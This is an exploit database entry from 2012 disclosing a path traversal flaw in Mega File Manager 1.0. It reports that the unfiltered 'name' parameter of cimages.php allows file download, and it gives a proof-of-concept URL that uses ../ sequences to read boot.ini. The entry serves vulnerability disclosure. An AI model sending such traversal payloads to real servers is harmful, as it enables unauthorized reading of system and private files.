Mega File Manager - File Download

2012-04-22T00:00:00
ID EXPLOITPACK:94DBD6F530BE035AEF4B7CB7E65FDC84
Type exploitpack
Reporter i2sec-Min Gi Jo
Modified 2012-04-22T00:00:00

Description

Mega File Manager - File Download

                                        
                                            # Exploit Title: [MegaFileManager FileDownload Vulnerability

# date: 2012-04-19

# Author: i2sec-Min Gi Jo

# Software Link: http://www.awesomephp.com/?Download*5

# Version: Mega File Manager V 1.0

# Tested on: Windows




# Description : There is no filtering on 'cimages.php' parameter 'name'.


# PoC : http://[server]/megafilemanager/cimages.php?name=../../../../boot.ini